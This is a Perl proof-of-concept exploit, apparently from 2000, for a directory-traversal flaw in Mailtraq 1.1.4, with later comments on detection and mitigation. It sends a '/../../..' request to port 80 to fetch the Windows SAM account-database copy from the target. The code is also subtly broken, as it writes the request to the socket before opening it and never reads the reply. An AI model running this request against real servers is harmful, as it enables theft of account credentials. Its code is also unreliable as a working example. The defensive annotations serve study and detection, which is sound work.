#!/usr/bin/perl
#
# Mailtraq-b0f.pl
# Mailtraq 1.1.4 remote exploit (root dot dot bug)
# coded by slash <tcsh@b0f.i-p.com>
#
# Based on my advisory published in February, Mailtraq is 
# vulnerable to a root dot dot bug, which allows a certain 
# user to get any file from the victim's hard drive. Note that
# this was coded just as proof-of-concept.
#
# Usage: [slash@linux]# ./Mailtraq-b0f.pl <victim> 
#
# Greetz: Scrippie, HWA, eth0, sirius, Cruciphux, Mixter, #!/bin/zsh
# synnergy, orbflux, soupnazi, JimJones and a big shoutout to lamagra.


use IO::Socket;

# Proof-of-concept driver for the Mailtraq 1.1.4 "root dot dot" (directory
# traversal) issue described in the header. The whole script is a flat run of
# statements over package globals; there is no `use strict` / `use warnings`,
# so undeclared or unset variables are not reported at compile time.
#
# Settings:
#   $host - target host name/address, taken unvalidated from the first
#           command-line argument (undef when no argument is given).
#   $port - fixed at 80, the web interface this request is addressed to.
#   $data - fixed path appended after the traversal prefix. The path names
#           the sam._ file in the NT repair directory (a copy of the account
#           database); a request for it in a web log is worth alerting on.
#   $wait - number of one-second pauses performed before the socket is closed.
$host = $ARGV[0];
$port = 80;
$data = "/winnt/repair/sam._";
$wait = 10;

# Banner and status output only; nothing below this point depends on it.
print "Mailtraq 1.1.4 remote exploit\n";
print "coded by slash <tcsh@b0f.i-p.com>\n";
print "This was coded just as proof-of-concept\n";
print "\nFetching $data...\n";

# Request line used by the PoC: a GET whose path starts with "/../../.."
# followed by $data. For defenders this string is the useful artifact:
#   - detection: request URIs beginning with "/../" sequences, or any
#     request path that resolves outside the server's document root;
#   - mitigation: the server must canonicalize the request path and refuse
#     anything that escapes the document root; the header ties the flaw to
#     Mailtraq 1.1.4, so check the vendor's advisory for a corrected release.
# NOTE(review): $socket is first assigned further down in this listing, so
# no connection exists yet when this statement runs.
print $socket "GET /../../..$data HTTP/1.0\n";


# Open a TCP connection to $host:$port. The `||` applies to the value
# returned by new(), so a failed connect ends the script with
# "Connection failed." and nothing after this statement runs.
print "Connecting to $host...";
$socket = IO::Socket::INET->
		new(Proto=>"tcp", 
		PeerAddr=>$host, 
		PeerPort=>$port) 
		|| die "Connection failed.\n";

# Fixed delay: sleep one second and print a dot, $wait times. The socket is
# never read from, so no response is displayed or stored by this script.
print "Waiting...";
$time = 0;
while ($time < $wait) {
        sleep(1);
        print ".";
        $time += 1;
}

# Finished.
# The return value of close() is not checked.
close($socket);
print "\nConnection closed. Finished.\n";

# EOF
#                   www.hack.co.za   [5 September 2000]#